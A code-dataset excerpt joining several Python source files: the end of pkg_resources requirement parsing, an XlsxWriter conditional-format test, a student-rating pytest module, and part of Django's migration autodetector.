                DISTRO, CBRACKET, line, p, (1,), "'extra' name"
            )
        line, p, specs = scan_list(VERSION,LINE_END,line,p,(1,2),"version spec")
        specs = [(op,safe_version(val)) for op,val in specs]
        yield Requirement(project_name, specs, extras)
def _sort_dists(dists):
tmp = [(dist.hashcmp,dist) for dist in dists]
tmp.sort()
dists[::-1] = [d for hc,d in tmp]
class Requirement:
    """A parsed requirement: project name, version specs, and extras."""
    def __init__(self, project_name, specs, extras):
        """DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
        self.unsafe_name, project_name = project_name, safe_name(project_name)
        self.project_name, self.key = project_name, project_name.lower()
        # `index` pairs each spec with its parsed version and the 3-char
        # action string from `state_machine`; sorted by parsed version so
        # __contains__ can scan it in order.
        index = [(parse_version(v),state_machine[op],op,v) for op,v in specs]
        index.sort()
        self.specs = [(op,ver) for parsed,trans,op,ver in index]
        self.index, self.extras = index, tuple(map(safe_extra,extras))
        self.hashCmp = (
            self.key, tuple([(op,parsed) for parsed,trans,op,ver in index]),
            frozenset(self.extras)
        )
        self.__hash = hash(self.hashCmp)
    def __str__(self):
        specs = ','.join([''.join(s) for s in self.specs])
        extras = ','.join(self.extras)
        if extras: extras = '[%s]' % extras
        return '%s%s%s' % (self.project_name, extras, specs)
    def __eq__(self,other):
        return isinstance(other,Requirement) and self.hashCmp==other.hashCmp
    def __contains__(self,item):
        # `item` may be a Distribution, a version string, or a parsed tuple.
        if isinstance(item,Distribution):
            # NOTE: `<>` is the Python 2 spelling of `!=`.
            if item.key <> self.key: return False
            if self.index: item = item.parsed_version # only get if we need it
        elif isinstance(item,basestring):
            item = parse_version(item)
        last = None
        compare = lambda a, b: (a > b) - (a < b) # -1, 0, 1
        # Drive the state machine: 'T'/'F' decide immediately; '+'/'-' set a
        # tentative verdict that later specs may refine.
        for parsed,trans,op,ver in self.index:
            action = trans[compare(item,parsed)] # Indexing: 0, 1, -1
            if action=='F': return False
            elif action=='T': return True
            elif action=='+': last = True
            elif action=='-' or last is None: last = False
        if last is None: last = True # no rules encountered
        return last
    def __hash__(self):
        return self.__hash
    def __repr__(self): return "Requirement.parse(%r)" % str(self)
    #@staticmethod
    def parse(s, replacement=True):
        # Parse exactly one requirement from `s`; with `replacement` true, a
        # plain 0.6-series "setuptools" request is answered with distribute.
        reqs = list(parse_requirements(s))
        if reqs:
            if len(reqs) == 1:
                founded_req = reqs[0]
                # if asked for setuptools distribution
                # and if distribute is installed, we want to give
                # distribute instead
                if _override_setuptools(founded_req) and replacement:
                    distribute = list(parse_requirements('distribute'))
                    if len(distribute) == 1:
                        return distribute[0]
                    return founded_req
                else:
                    return founded_req
            raise ValueError("Expected only one requirement", s)
        raise ValueError("No requirements found", s)
    parse = staticmethod(parse)
# Transition table for Requirement.__contains__.  Each comparison operator
# maps to a 3-character action string indexed by cmp(candidate, spec):
# position 0 = equal, 1 = greater, -1 (last) = less.  Actions: 'T' match,
# 'F' no match, '+'/'-' tentative match/unmatch (later specs may refine),
# '.' no effect.
state_machine = {
    # =><
    '<' : '--T',
    '<=': 'T-T',
    '>' : 'F+F',
    '>=': 'T+F',
    '==': 'T..',
    '!=': 'F++',
}
def _override_setuptools(req):
"""Return True when distribute wants to override a setuptools dependency.
We want to override when the requirement is setuptools and the version is
a variant of 0.6.
"""
if req.project_name == 'setuptools':
if not len(req.specs):
# Just setuptools: ok
return True
for comparator, version in req.specs:
if comparator in ['==', '>=', '>']:
if version.startswith('0.7'):
# We want some setuptools not from the 0.6 series.
return False
return True
return False
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls,type):
class cls(cls,object): pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
    """Ensure that the parent directory of `path` exists.

    Fixes two problems with the old isdir-then-makedirs version: a bare
    filename (empty dirname) no longer crashes in ``os.makedirs('')``, and
    the check/create race (another process creating the directory between
    the isdir() test and makedirs()) no longer raises.
    """
    dirname = os.path.dirname(path)
    if not dirname:
        # `path` has no directory component; its parent is the cwd.
        return
    try:
        os.makedirs(dirname)
    except OSError:
        # Already existed, or a concurrent creator won the race; only
        # propagate if the directory still isn't there.
        if not os.path.isdir(dirname):
            raise
def split_sections(s):
    """Split a string or iterable thereof into (section,content) pairs

    Each ``section`` is a stripped version of the section header ("[section]")
    and each ``content`` is a list of stripped lines excluding blank lines and
    comment-only lines.  If there are any such lines before the first section
    header, they're returned in a first ``section`` of ``None``.
    """
    current_header = None
    current_lines = []
    for line in yield_lines(s):
        if not line.startswith("["):
            current_lines.append(line)
            continue
        if not line.endswith("]"):
            raise ValueError("Invalid section heading", line)
        # Flush the previous section before starting the new one.
        if current_header or current_lines:
            yield current_header, current_lines
        current_header = line[1:-1].strip()
        current_lines = []
    # wrap up the final segment
    yield current_header, current_lines
def _mkstemp(*args, **kw):
    """mkstemp() that temporarily restores the genuine ``os.open``.

    The install sandbox replaces os.open; tempfile needs the real one, so
    it is swapped in just for the duration of the call.
    """
    from tempfile import mkstemp
    saved_open = os.open
    os.open = os_open # temporarily bypass sandboxing
    try:
        return mkstemp(*args, **kw)
    finally:
        os.open = saved_open # and then put it back
# Set up global resource manager
_manager = ResourceManager()
def _initialize(g):
    # Re-export every public ResourceManager method (resource_string,
    # resource_stream, etc.) as a module-level function bound to the shared
    # manager instance.
    for name in dir(_manager):
        if not name.startswith('_'):
            g[name] = getattr(_manager, name)
_initialize(globals())
# Prepare the master working set and make the ``require()`` API available
working_set = WorkingSet()
try:
    # Does the main program list any requirements?
    from __main__ import __requires__
except ImportError:
    pass # No: just use the default working set based on sys.path
else:
    # Yes: ensure the requirements are met, by prefixing sys.path if necessary
    try:
        working_set.require(__requires__)
    except VersionConflict: # try it without defaults already on sys.path
        working_set = WorkingSet([]) # by starting with an empty path
        for dist in working_set.resolve(
            parse_requirements(__requires__), Environment()
        ):
            working_set.add(dist)
        for entry in sys.path: # add any missing entries from sys.path
            if entry not in working_set.entries:
                working_set.add_entry(entry)
        sys.path[:] = working_set.entries # then copy back to sys.path
# Module-level aliases: the public API is the master working set's methods.
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
run_main = run_script   # backward compatibility
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
add_activation_listener(lambda dist: dist.activate())
# Rebuild entries in sys.path order; Python 2's eager map() performs the
# add_entry calls immediately.
working_set.entries=[]; map(working_set.add_entry,sys.path) # match order
| 32.909596 | 94 | 0.618815 |
8a1a7080fe7cd3a52801cb83158be8200f30f2f1 | 4,460 | py | Python | xlsxwriter/test/worksheet/test_cond_format12.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/worksheet/test_cond_format12.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/worksheet/test_cond_format12.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
    """
    Test assembling a complete Worksheet file.

    """
    def test_assemble_xml_file(self):
        """Test writing a worksheet with conditional formatting."""
        self.maxDiff = None

        fh = StringIO()
        worksheet = Worksheet()
        worksheet._set_filehandle(fh)
        worksheet.select()

        # Fill A1:A12 with the values 1..12; (row, col) addressing is
        # equivalent to the 'A1'-style strings.
        for row in range(12):
            worksheet.write(row, 0, row + 1)

        # Apply a default two-colour scale over the populated range.
        worksheet.conditional_format('A1:A12', {'type': '2_color_scale'})

        worksheet._assemble_xml_file()

        exp = _xml_to_list("""
                <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
                  <dimension ref="A1:A12"/>
                  <sheetViews>
                    <sheetView tabSelected="1" workbookViewId="0"/>
                  </sheetViews>
                  <sheetFormatPr defaultRowHeight="15"/>
                  <sheetData>
                    <row r="1" spans="1:1">
                      <c r="A1">
                        <v>1</v>
                      </c>
                    </row>
                    <row r="2" spans="1:1">
                      <c r="A2">
                        <v>2</v>
                      </c>
                    </row>
                    <row r="3" spans="1:1">
                      <c r="A3">
                        <v>3</v>
                      </c>
                    </row>
                    <row r="4" spans="1:1">
                      <c r="A4">
                        <v>4</v>
                      </c>
                    </row>
                    <row r="5" spans="1:1">
                      <c r="A5">
                        <v>5</v>
                      </c>
                    </row>
                    <row r="6" spans="1:1">
                      <c r="A6">
                        <v>6</v>
                      </c>
                    </row>
                    <row r="7" spans="1:1">
                      <c r="A7">
                        <v>7</v>
                      </c>
                    </row>
                    <row r="8" spans="1:1">
                      <c r="A8">
                        <v>8</v>
                      </c>
                    </row>
                    <row r="9" spans="1:1">
                      <c r="A9">
                        <v>9</v>
                      </c>
                    </row>
                    <row r="10" spans="1:1">
                      <c r="A10">
                        <v>10</v>
                      </c>
                    </row>
                    <row r="11" spans="1:1">
                      <c r="A11">
                        <v>11</v>
                      </c>
                    </row>
                    <row r="12" spans="1:1">
                      <c r="A12">
                        <v>12</v>
                      </c>
                    </row>
                  </sheetData>
                  <conditionalFormatting sqref="A1:A12">
                    <cfRule type="colorScale" priority="1">
                      <colorScale>
                        <cfvo type="min" val="0"/>
                        <cfvo type="max" val="0"/>
                        <color rgb="FFFF7128"/>
                        <color rgb="FFFFEF9C"/>
                      </colorScale>
                    </cfRule>
                  </conditionalFormatting>
                  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
                </worksheet>
                """)

        got = _xml_to_list(fh.getvalue())

        self.assertEqual(got, exp)
d82b53c06ea25d76341622c93e14f15b5f8a325d | 1,340 | py | Python | test/test_GetStudents3Q.py | Vsevolearn/PTLab1 | 5cc51f6beb7fe82b61a2ef839a9408c0d17fe485 | [
"MIT"
] | null | null | null | test/test_GetStudents3Q.py | Vsevolearn/PTLab1 | 5cc51f6beb7fe82b61a2ef839a9408c0d17fe485 | [
"MIT"
] | null | null | null | test/test_GetStudents3Q.py | Vsevolearn/PTLab1 | 5cc51f6beb7fe82b61a2ef839a9408c0d17fe485 | [
"MIT"
] | 1 | 2021-12-03T01:11:01.000Z | 2021-12-03T01:11:01.000Z | from typing import Dict, Tuple
from Types import DataType
from CalcRating import CalcRating
from GetStudents3Q import GetStudents3Q
import pytest
RatingsType = Dict[str, float]
class TestStudents3Q():
@pytest.fixture()
def input_data(self) -> Tuple[DataType, RatingsType]:
rating_scores: RatingsType = {
'Иванов Иван Иванович': 82.0,
'Петров1 Петр Петрович': 63.333333333333336,
'Петров2 Петр Петрович': 76.0,
'Петров3 Петр Петрович': 89.33333333333333,
'Петров4 Петр Петрович': 91.66666666666667
}
student_list: RatingsType = {
'Иванов Иван Иванович': 82.0,
'Петров3 Петр Петрович': 89.33333333333333
}
return rating_scores, student_list
def test_init_get_students_3q(self, input_data:
Tuple[RatingsType, RatingsType]) -> None:
rating_scores = GetStudents3Q(input_data[0])
assert input_data[0] == rating_scores.rating
def test_get(self, input_data:
Tuple[DataType, RatingsType]) -> None:
student_list = GetStudents3Q(input_data[0]).get()
for student in student_list.keys():
rating = student_list[student]
assert pytest.approx(
rating, abs=0.001) == input_data[1][student]
| 36.216216 | 75 | 0.630597 |
95ef890ac69ce222ff2e3c487ae6b7f9c0bd29fe | 51,313 | py | Python | django/db/migrations/autodetector.py | HenriqueLR/django | d1ca70110f49f0be90206c8da516ac16aebc8c75 | [
"BSD-3-Clause"
] | 2 | 2015-01-21T15:45:07.000Z | 2015-02-21T02:38:13.000Z | django/db/migrations/autodetector.py | HenriqueLR/django | d1ca70110f49f0be90206c8da516ac16aebc8c75 | [
"BSD-3-Clause"
] | null | null | null | django/db/migrations/autodetector.py | HenriqueLR/django | d1ca70110f49f0be90206c8da516ac16aebc8c75 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
import re
import datetime
from itertools import chain
from django.utils import six
from django.db import models
from django.conf import settings
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.questioner import MigrationQuestioner
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.operations.models import AlterModelOptions
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
    """Store the two project states to diff and the questioner used to
    resolve ambiguous cases (defaults to a non-interactive one)."""
    self.from_state = from_state
    self.to_state = to_state
    self.questioner = questioner or MigrationQuestioner()
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
    """
    Main entry point to produce a list of appliable changes.
    Takes a graph to base names on and an optional set of apps
    to try and restrict to (restriction is not guaranteed)
    """
    changes = self._detect_changes(convert_apps, graph)
    # Name and order the migrations against the existing graph.
    changes = self.arrange_for_graph(changes, graph, migration_name)
    if trim_to_apps:
        changes = self._trim_to_apps(changes, trim_to_apps)
    return changes
def deep_deconstruct(self, obj):
    """
    Recursive deconstruction for a field and its arguments.
    Used for full comparison for rename/alter; sometimes a single-level
    deconstruction will not compare correctly.
    """
    # Plain values (no deconstruct protocol) and classes pass through as-is.
    if not hasattr(obj, 'deconstruct') or isinstance(obj, type):
        return obj
    deconstructed = obj.deconstruct()
    if isinstance(obj, models.Field):
        # we have a field which also returns a name
        deconstructed = deconstructed[1:]
    path, args, kwargs = deconstructed
    return (
        path,
        [self.deep_deconstruct(value) for value in args],
        dict(
            (key, self.deep_deconstruct(value))
            for key, value in kwargs.items()
        ),
    )
def only_relation_agnostic_fields(self, fields):
    """
    Return a definition of the fields that ignores field names and
    what related fields actually relate to.
    Used for detecting renames (as, of course, the related fields
    change during renames)
    """
    fields_def = []
    for name, field in fields:
        deconstruction = self.deep_deconstruct(field)
        # Drop the 'to' kwarg so a renamed relation target still matches.
        if field.rel and field.rel.to:
            del deconstruction[2]['to']
        fields_def.append(deconstruction)
    return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
    """
    Returns a dict of migration plans which will achieve the
    change from from_state to to_state. The dict has app labels
    as keys and a list of migrations as values.

    The resulting migrations aren't specially named, but the names
    do matter for dependencies inside the set.

    convert_apps is the list of apps to convert to use migrations
    (i.e. to make initial migrations for, in the usual case)

    graph is an optional argument that, if provided, can help improve
    dependency generation and avoid potential circular dependencies.
    """
    # The first phase is generating all the operations for each app
    # and gathering them into a big per-app list.
    # We'll then go through that list later and order it and split
    # into migrations to resolve dependencies caused by M2Ms and FKs.
    self.generated_operations = {}

    # Prepare some old/new state and model lists, separating
    # proxy models and ignoring unmigrated apps.
    self.old_apps = self.from_state.render(ignore_swappable=True)
    self.new_apps = self.to_state.render()
    self.old_model_keys = []
    self.old_proxy_keys = []
    self.old_unmanaged_keys = []
    self.new_model_keys = []
    self.new_proxy_keys = []
    self.new_unmanaged_keys = []
    for al, mn in sorted(self.from_state.models.keys()):
        model = self.old_apps.get_model(al, mn)
        if not model._meta.managed:
            self.old_unmanaged_keys.append((al, mn))
        elif al not in self.from_state.real_apps:
            if model._meta.proxy:
                self.old_proxy_keys.append((al, mn))
            else:
                self.old_model_keys.append((al, mn))
    for al, mn in sorted(self.to_state.models.keys()):
        model = self.new_apps.get_model(al, mn)
        if not model._meta.managed:
            self.new_unmanaged_keys.append((al, mn))
        elif (
            al not in self.from_state.real_apps or
            (convert_apps and al in convert_apps)
        ):
            if model._meta.proxy:
                self.new_proxy_keys.append((al, mn))
            else:
                self.new_model_keys.append((al, mn))

    # Renames have to come first
    self.generate_renamed_models()

    # Prepare field lists, and prepare a list of the fields that used
    # through models in the old state so we can make dependencies
    # from the through model deletion to the field that uses it.
    self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
    self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
    self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
    self.through_users = {}
    self.old_field_keys = set()
    self.new_field_keys = set()
    for app_label, model_name in sorted(self.kept_model_keys):
        old_model_name = self.renamed_models.get((app_label, model_name), model_name)
        old_model_state = self.from_state.models[app_label, old_model_name]
        new_model_state = self.to_state.models[app_label, model_name]
        self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
        self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)

    # Through model map generation
    for app_label, model_name in sorted(self.old_model_keys):
        old_model_name = self.renamed_models.get((app_label, model_name), model_name)
        old_model_state = self.from_state.models[app_label, old_model_name]
        for field_name, field in old_model_state.fields:
            old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field_by_name(field_name)[0]
            if hasattr(old_field, "rel") and getattr(old_field.rel, "through", None) and not old_field.rel.through._meta.auto_created:
                through_key = (
                    old_field.rel.through._meta.app_label,
                    old_field.rel.through._meta.object_name.lower(),
                )
                self.through_users[through_key] = (app_label, old_model_name, field_name)

    # Generate non-rename model operations
    self.generate_deleted_models()
    self.generate_created_models()
    self.generate_deleted_proxies()
    self.generate_created_proxies()
    self.generate_altered_options()

    # Generate field operations
    self.generate_renamed_fields()
    self.generate_removed_fields()
    self.generate_added_fields()
    self.generate_altered_fields()
    self.generate_altered_unique_together()
    self.generate_altered_index_together()
    self.generate_altered_order_with_respect_to()

    # Now, reordering to make things possible. The order we have already
    # isn't bad, but we need to pull a few things around so FKs work nicely
    # inside the same app.
    for app_label, ops in sorted(self.generated_operations.items()):
        # Bounded iteration count guards against pathological inputs;
        # the original code shadowed this loop variable, so use `_`.
        for _ in range(10000):
            found = False
            for i, op in enumerate(ops):
                for dep in op._auto_deps:
                    if dep[0] == app_label:
                        # Alright, there's a dependency on the same app.
                        for j, op2 in enumerate(ops):
                            if self.check_dependency(op2, dep) and j > i:
                                # Move op just after the operation it depends on.
                                ops = ops[:i] + ops[i + 1:j + 1] + [op] + ops[j + 1:]
                                found = True
                                break
                        if found:
                            break
                if found:
                    break
            if not found:
                break
        else:
            raise ValueError("Infinite loop caught in operation dependency resolution")
        self.generated_operations[app_label] = ops

    # Now, we need to chop the lists of operations up into migrations with
    # dependencies on each other.
    # We do this by stepping up an app's list of operations until we
    # find one that has an outgoing dependency that isn't in another app's
    # migration yet (hasn't been chopped off its list). We then chop off the
    # operations before it into a migration and move onto the next app.
    # If we loop back around without doing anything, there's a circular
    # dependency (which _should_ be impossible as the operations are all
    # split at this point so they can't depend and be depended on).
    self.migrations = {}
    num_ops = sum(len(x) for x in self.generated_operations.values())
    chop_mode = False
    while num_ops:
        # On every iteration, we step through all the apps and see if there
        # is a completed set of operations.
        # If we find that a subset of the operations are complete we can
        # try to chop it off from the rest and continue, but we only
        # do this if we've already been through the list once before
        # without any chopping and nothing has changed.
        for app_label in sorted(self.generated_operations.keys()):
            chopped = []
            dependencies = set()
            for operation in list(self.generated_operations[app_label]):
                deps_satisfied = True
                operation_dependencies = set()
                for dep in operation._auto_deps:
                    is_swappable_dep = False
                    if dep[0] == "__setting__":
                        # We need to temporarily resolve the swappable dependency to prevent
                        # circular references. While keeping the dependency checks on the
                        # resolved model we still add the swappable dependencies.
                        # See #23322
                        resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
                        original_dep = dep
                        dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
                        is_swappable_dep = True
                    if dep[0] != app_label and dep[0] != "__setting__":
                        # External app dependency. See if it's not yet
                        # satisfied.
                        for other_operation in self.generated_operations.get(dep[0], []):
                            if self.check_dependency(other_operation, dep):
                                deps_satisfied = False
                                break
                        if not deps_satisfied:
                            break
                        else:
                            if is_swappable_dep:
                                operation_dependencies.add((original_dep[0], original_dep[1]))
                            elif dep[0] in self.migrations:
                                operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
                            else:
                                # If we can't find the other app, we add a first/last dependency,
                                # but only if we've already been through once and checked everything
                                if chop_mode:
                                    # If the app already exists, we add a dependency on the last migration,
                                    # as we don't know which migration contains the target field.
                                    # If it's not yet migrated or has no migrations, we use __first__
                                    if graph and graph.leaf_nodes(dep[0]):
                                        operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
                                    else:
                                        operation_dependencies.add((dep[0], "__first__"))
                                else:
                                    deps_satisfied = False
                if deps_satisfied:
                    chopped.append(operation)
                    dependencies.update(operation_dependencies)
                    self.generated_operations[app_label] = self.generated_operations[app_label][1:]
                else:
                    break
            # Make a migration! Well, only if there's stuff to put in it
            if dependencies or chopped:
                if not self.generated_operations[app_label] or chop_mode:
                    subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
                    instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
                    instance.dependencies = list(dependencies)
                    instance.operations = chopped
                    self.migrations.setdefault(app_label, []).append(instance)
                    chop_mode = False
                else:
                    self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
        new_num_ops = sum(len(x) for x in self.generated_operations.values())
        if new_num_ops == num_ops:
            if not chop_mode:
                chop_mode = True
            else:
                raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
        num_ops = new_num_ops

    # OK, add in internal dependencies among the migrations
    for app_label, migrations in self.migrations.items():
        for m1, m2 in zip(migrations, migrations[1:]):
            m2.dependencies.append((app_label, m1.name))

    # De-dupe dependencies
    for app_label, migrations in self.migrations.items():
        for migration in migrations:
            migration.dependencies = list(set(migration.dependencies))

    # Optimize migrations
    for app_label, migrations in self.migrations.items():
        for migration in migrations:
            migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)

    return self.migrations
def check_dependency(self, operation, dependency):
    """
    Checks if an operation dependency matches an operation.

    A dependency is a tuple (app_label, model_name, field_name, kind)
    where kind is True (created), False (removed), "alter", or
    "order_wrt_unset", as used by the generate_* methods.
    """
    # Created model
    if dependency[2] is None and dependency[3] is True:
        return (
            isinstance(operation, operations.CreateModel) and
            operation.name.lower() == dependency[1].lower()
        )
    # Created field
    elif dependency[2] is not None and dependency[3] is True:
        return (
            (
                isinstance(operation, operations.CreateModel) and
                operation.name.lower() == dependency[1].lower() and
                any(dependency[2] == x for x, y in operation.fields)
            ) or
            (
                isinstance(operation, operations.AddField) and
                operation.model_name.lower() == dependency[1].lower() and
                operation.name.lower() == dependency[2].lower()
            )
        )
    # Removed field
    elif dependency[2] is not None and dependency[3] is False:
        return (
            isinstance(operation, operations.RemoveField) and
            operation.model_name.lower() == dependency[1].lower() and
            operation.name.lower() == dependency[2].lower()
        )
    # Removed model
    elif dependency[2] is None and dependency[3] is False:
        return (
            isinstance(operation, operations.DeleteModel) and
            operation.name.lower() == dependency[1].lower()
        )
    # Field being altered
    elif dependency[2] is not None and dependency[3] == "alter":
        return (
            isinstance(operation, operations.AlterField) and
            operation.model_name.lower() == dependency[1].lower() and
            operation.name.lower() == dependency[2].lower()
        )
    # order_with_respect_to being unset for a field
    elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
        return (
            isinstance(operation, operations.AlterOrderWithRespectTo) and
            operation.name.lower() == dependency[1].lower() and
            (operation.order_with_respect_to or "").lower() != dependency[2].lower()
        )
    # Unknown dependency. Raise an error.
    else:
        raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
    """Queue an operation for app_label, recording its dependencies.

    Dependencies are (app_label, model_name, field_name, create/delete
    as True/False) tuples; they are stashed on the operation itself for
    the later ordering/chopping phases.
    """
    operation._auto_deps = dependencies or []
    if beginning:
        self.generated_operations.setdefault(app_label, []).insert(0, operation)
    else:
        self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
    """
    Sorting key function that places potential swappable models first in
    lists of created models (only real way to solve #22783)
    """
    try:
        model = self.new_apps.get_model(item[0], item[1])
        base_names = [base.__name__ for base in model.__bases__]
        string_version = "%s.%s" % (item[0], item[1])
        if (
            model._meta.swappable or
            "AbstractUser" in base_names or
            "AbstractBaseUser" in base_names or
            settings.AUTH_USER_MODEL.lower() == string_version.lower()
        ):
            # "___" sorts before normal labels, pushing these items first.
            return ("___" + item[0], "___" + item[1])
    except LookupError:
        # Model not present in the new state; fall through to plain key.
        pass
    return item
def generate_renamed_models(self):
    """
    Finds any renamed models, and generates the operations for them,
    and removes the old entry from the model lists.
    Must be run before other model-level generation.
    """
    self.renamed_models = {}
    self.renamed_models_rel = {}
    added_models = set(self.new_model_keys) - set(self.old_model_keys)
    for app_label, model_name in sorted(added_models):
        model_state = self.to_state.models[app_label, model_name]
        model_fields_def = self.only_relation_agnostic_fields(model_state.fields)

        removed_models = set(self.old_model_keys) - set(self.new_model_keys)
        for rem_app_label, rem_model_name in removed_models:
            if rem_app_label == app_label:
                rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
                rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
                # Identical field definitions => candidate rename; confirm
                # with the questioner before emitting a RenameModel.
                if model_fields_def == rem_model_fields_def:
                    if self.questioner.ask_rename_model(rem_model_state, model_state):
                        self.add_operation(
                            app_label,
                            operations.RenameModel(
                                old_name=rem_model_state.name,
                                new_name=model_state.name,
                            )
                        )
                        self.renamed_models[app_label, model_name] = rem_model_name
                        self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
                        self.old_model_keys.remove((rem_app_label, rem_model_name))
                        self.old_model_keys.append((app_label, model_name))
                        break
def generate_created_models(self):
    """
    Find all new models (both managed and unmanaged) and make create
    operations for them as well as separate operations to create any
    foreign key or M2M relationships (we'll optimize these back in later
    if we can).

    We also defer any model options that refer to collections of fields
    that might be deferred (e.g. unique_together, index_together).
    """
    added_models = set(self.new_model_keys) - set(self.old_model_keys)
    added_unmanaged_models = set(self.new_unmanaged_keys) - set(self.old_unmanaged_keys)
    models = chain(
        sorted(added_models, key=self.swappable_first_key, reverse=True),
        sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
    )
    for app_label, model_name in models:
        model_state = self.to_state.models[app_label, model_name]
        model_opts = self.new_apps.get_model(app_label, model_name)._meta
        # Gather related fields
        related_fields = {}
        primary_key_rel = None
        for field in model_opts.local_fields:
            if field.rel:
                if field.rel.to:
                    if field.primary_key:
                        primary_key_rel = field.rel.to
                    else:
                        related_fields[field.name] = field
                # through will be none on M2Ms on swapped-out models;
                # we can treat lack of through as auto_created=True, though.
                if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
                    related_fields[field.name] = field
        for field in model_opts.local_many_to_many:
            if field.rel.to:
                related_fields[field.name] = field
            if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
                related_fields[field.name] = field
        # Are there unique/index_together to defer?
        unique_together = model_state.options.pop('unique_together', None)
        index_together = model_state.options.pop('index_together', None)
        order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
        # Depend on the deletion of any possible proxy version of us
        dependencies = [
            (app_label, model_name, None, False),
        ]
        # Depend on all bases
        for base in model_state.bases:
            if isinstance(base, six.string_types) and "." in base:
                base_app_label, base_name = base.split(".", 1)
                dependencies.append((base_app_label, base_name, None, True))
        # Depend on the other end of the primary key if it's a relation
        if primary_key_rel:
            dependencies.append((
                primary_key_rel._meta.app_label,
                primary_key_rel._meta.object_name,
                None,
                True
            ))
        # Generate creation operation
        self.add_operation(
            app_label,
            operations.CreateModel(
                name=model_state.name,
                fields=[d for d in model_state.fields if d[0] not in related_fields],
                options=model_state.options,
                bases=model_state.bases,
            ),
            dependencies=dependencies,
            beginning=True,
        )

        # Don't add operations which modify the database for unmanaged models
        if not model_opts.managed:
            continue

        # Generate operations for each related field
        for name, field in sorted(related_fields.items()):
            # Account for FKs to swappable models
            swappable_setting = getattr(field, 'swappable_setting', None)
            if swappable_setting is not None:
                dep_app_label = "__setting__"
                dep_object_name = swappable_setting
            else:
                dep_app_label = field.rel.to._meta.app_label
                dep_object_name = field.rel.to._meta.object_name
            dependencies = [(dep_app_label, dep_object_name, None, True)]
            if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
                dependencies.append((
                    field.rel.through._meta.app_label,
                    field.rel.through._meta.object_name,
                    None,
                    True
                ))
            # Depend on our own model being created
            dependencies.append((app_label, model_name, None, True))
            # Make operation
            self.add_operation(
                app_label,
                operations.AddField(
                    model_name=model_name,
                    name=name,
                    field=field,
                ),
                dependencies=list(set(dependencies)),
            )
        # Generate other opns
        related_dependencies = [
            (app_label, model_name, name, True)
            for name, field in sorted(related_fields.items())
        ]
        related_dependencies.append((app_label, model_name, None, True))
        if unique_together:
            self.add_operation(
                app_label,
                operations.AlterUniqueTogether(
                    name=model_name,
                    unique_together=unique_together,
                ),
                dependencies=related_dependencies
            )
        if index_together:
            self.add_operation(
                app_label,
                operations.AlterIndexTogether(
                    name=model_name,
                    index_together=index_together,
                ),
                dependencies=related_dependencies
            )
        if order_with_respect_to:
            self.add_operation(
                app_label,
                operations.AlterOrderWithRespectTo(
                    name=model_name,
